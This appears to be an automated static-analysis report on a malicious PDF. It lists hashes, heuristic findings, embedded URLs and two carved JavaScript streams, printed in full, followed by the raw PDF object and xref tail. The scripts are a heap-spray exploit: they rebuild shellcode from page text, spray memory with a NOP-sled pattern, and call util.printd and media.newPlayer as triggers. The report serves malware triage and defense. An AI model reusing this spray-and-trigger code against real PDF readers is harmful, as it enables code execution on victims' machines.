Malicious PDF — malware analysis report

Static analysis result for SHA-256 2ee76409fcb1d418…

MALICIOUS

PDF

1.24 MB Created: 2010-07-28 14:49:23 Authoring application: Scribus 1.3.3.14 (via Scribus PDF Library 1.3.3.14) First seen: 2026-05-10
MD5: 4e9df4c856abbf64b936498c27940c99 SHA-1: 60b685f941b9d3deb17142fd63fa892ec405a8c2 SHA-256: 2ee76409fcb1d4187974b6aec5f1ef972611f573c06b26e7834d92a0c5724fe8
118 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream, named 'javascript_obj0055_001.js', is obfuscated and uses String.fromCharCode, suggesting it is designed to download and execute a second-stage payload. The script assembles its payload at runtime from the document's own page text (via getPageNumWords/getPageNthWord), so the specific payload and its destination cannot be recovered from the static view of the script alone; the presence of obfuscated JavaScript is nevertheless a strong indicator of malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9876

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var Wo = educ(shell);
    var yR = educ(String.fromCharCode(37,117,51,55,50,55,37,117,50,55,102,53));
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.monotype.comMonotype In PDF document text
    • http://ocsp.verisign.com/ocsp/status0In PDF document text
    • https://www.verisign.com/rpa0In PDF document text
    • http://www.monotype.com/html/mtname/ms_timesnewroman.htmlhttp://www.monotype.com/html/mtname/ms_welcome.htmlhttp://www.monotype.com/html/type/license.htmlIn PDF document text
    • https://www.verisign.com/rpaIn PDF document text
    • http://crl.microsoft.com/pki/crl/products/CodeSignPCA.crl0In PDF document text
    • http://www.microsoft.com/typographyIn PDF document text
    • http://www.iec.chIn PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0055_001.js pdf-javascript-stream PDF /JS object 55 at offset 0x13DBAE 1756 bytes
SHA-256: 116d8dca9cf9d5d6a317a894daceafbd850845d5bfe8fa229e0a9f62ec102055
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function educ(s) {

}



function New_Script()
{
var ckWord, numWords;
var text = '';

for (var i = 0; i < this.numPages; i++ ) 
{
numWords = this.getPageNumWords(i);
for (var j = 0; j < numWords; j++) 
{
ckWord = this.getPageNthWord(i, j);
text = text + ckWord.toString();
}
}

text = text + ' ';


var k = 1;
var b=0;
var shell = '';
var shell_1 = '';
var shell_2 = '';
var u_shell = '';
var pos = 0;
while (pos < (text.length-1)) {
 pos += k;
 if(!b)
 {
	b = 1;
	if (pos < text.length)
	{ shell_1 = shell_1 + text[pos] + text[pos+1]; pos+=2; }
	else 
	{ shell_1 = shell_1 + text[pos]; pos+=1; }
 }
 else
 {
	b = 0;
	if (pos < text.length)
	{ shell_2 = shell_2 + text[pos] + text[pos+1]; pos+=2; }
	else 
	{ shell_2 = shell_2 + text[pos]; pos+=1; }
	
	u_shell = '%u'+shell_2+shell_1;
	shell_1 = '';
	shell_2 = '';
	shell += u_shell;
 }
 k++;
 if (k>3) k = 1;
}

var Wo = educ(shell);
var yR = educ(String.fromCharCode(37,117,51,55,50,55,37,117,50,55,102,53));

for(i=0;i<15;){yR+=yR;i ++;}
yR=yR.substring(0,32768 - Wo.length);

memory=new Array();

for(i=0;i<0x2000;) {
	memory[i]= yR + Wo; i ++;
}

util[String.fromCharCode(112,114,105,110,116,100)](String.fromCharCode(49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,32,58,32,49,46,51,49,46,51,52), new Date());
util[String.fromCharCode(112,114,105,110,116,100)](String.fromCharCode(49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,32,58,32,49,46,51,49,46,51,52), new Date());
try {var obj = this.media;obj['new'+'Player'](null);} catch(e) {}
util[String.fromCharCode(112,114,105,110,116,100)](String.fromCharCode(49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,32,58,32,49,46,51,49,46,51,52), new Date());


}
javascript_obj0055_002.js pdf-javascript-stream PDF /JS object 55 at offset 0x13DBD1 3249 bytes
SHA-256: b4c035f2d20427887446b2d6603f989fac5e833a29bf27d356316d16d7662ee5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function educ(s) {

}



function New_Script()
{
var ckWord, numWords;
var text = '';

for (var i = 0; i < this.numPages; i++ ) 
{
numWords = this.getPageNumWords(i);
for (var j = 0; j < numWords; j++) 
{
ckWord = this.getPageNthWord(i, j);
text = text + ckWord.toString();
}
}

text = text + ' ';


var k = 1;
var b=0;
var shell = '';
var shell_1 = '';
var shell_2 = '';
var u_shell = '';
var pos = 0;
while (pos < (text.length-1)) {
 pos += k;
 if(!b)
 {
	b = 1;
	if (pos < text.length)
	{ shell_1 = shell_1 + text[pos] + text[pos+1]; pos+=2; }
	else 
	{ shell_1 = shell_1 + text[pos]; pos+=1; }
 }
 else
 {
	b = 0;
	if (pos < text.length)
	{ shell_2 = shell_2 + text[pos] + text[pos+1]; pos+=2; }
	else 
	{ shell_2 = shell_2 + text[pos]; pos+=1; }
	
	u_shell = '%u'+shell_2+shell_1;
	shell_1 = '';
	shell_2 = '';
	shell += u_shell;
 }
 k++;
 if (k>3) k = 1;
}

var Wo = educ(shell);
var yR = educ(String.fromCharCode(37,117,51,55,50,55,37,117,50,55,102,53));

for(i=0;i<15;){yR+=yR;i ++;}
yR=yR.substring(0,32768 - Wo.length);

memory=new Array();

for(i=0;i<0x2000;) {
	memory[i]= yR + Wo; i ++;
}

util[String.fromCharCode(112,114,105,110,116,100)](String.fromCharCode(49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,32,58,32,49,46,51,49,46,51,52), new Date());
util[String.fromCharCode(112,114,105,110,116,100)](String.fromCharCode(49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,32,58,32,49,46,51,49,46,51,52), new Date());
try {var obj = this.media;obj['new'+'Player'](null);} catch(e) {}
util[String.fromCharCode(112,114,105,110,116,100)](String.fromCharCode(49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,55,56,57,48,49,46,51,52,53,54,32,58,32,49,46,51,49,46,51,52), new Date());


}
endstream
endobj
56 0 obj
<< /S /JavaScript /JS 55 0 R >>
endobj
57 0 obj
<< /Names [ (New_Script) 56 0 R ] >>
endobj
7 0 obj
<< /JavaScript 57 0 R >>
endobj
8 0 obj
[]
endobj
xref
0 58
0000000000 65535 f 
0000000015 00000 n 
0000000266 00000 n 
0001301237 00000 n 
0001301283 00000 n 
0001301367 00000 n 
0001301388 00000 n 
0001303332 00000 n 
0001303372 00000 n 
0000000467 00000 n 
0000001848 00000 n 
0000411199 00000 n 
0000411422 00000 n 
0000412403 00000 n 
0000414242 00000 n 
0000417312 00000 n 
0000417507 00000 n 
0000418497 00000 n 
0000420636 00000 n 
0000423742 00000 n 
0000423937 00000 n 
0000424927 00000 n 
0000427257 00000 n 
0000430375 00000 n 
0000430570 00000 n 
0000431409 00000 n 
0000433138 00000 n 
0000435390 00000 n 
0000435585 00000 n 
0000436377 00000 n 
0000437824 00000 n 
0000439728 00000 n 
0000439923 00000 n 
0000440749 00000 n 
0000443111 00000 n 
0000445771 00000 n 
0000445966 00000 n 
0000446744 00000 n 
0000448072 00000 n 
0000449904 00000 n 
0000450099 00000 n 
0000450456 00000 n 
0000451125 00000 n 
0000452259 00000 n 
0000452454 00000 n 
0000453370 00000 n 
0000454829 00000 n 
0000961731 00000 n 
0000962195 00000 n 
0000962249 00000 n 
0000962409 00000 n 
0000962560 00000 n 
0001300754 00000 n 
0001300808 00000 n 
0001300987 00000 n 
0001301422 00000 n 
0001303231 00000 n 
0001303279 00000 n 
trailer
<<
/Size 58
/Root 1 0 R
/Info 2 0 R
/ID [<697D1C20E25187BC352F1C13D043A47C><697D1C20E25187BC352F1C13D043A47C>]
>>
startxref
1303390
%%EOF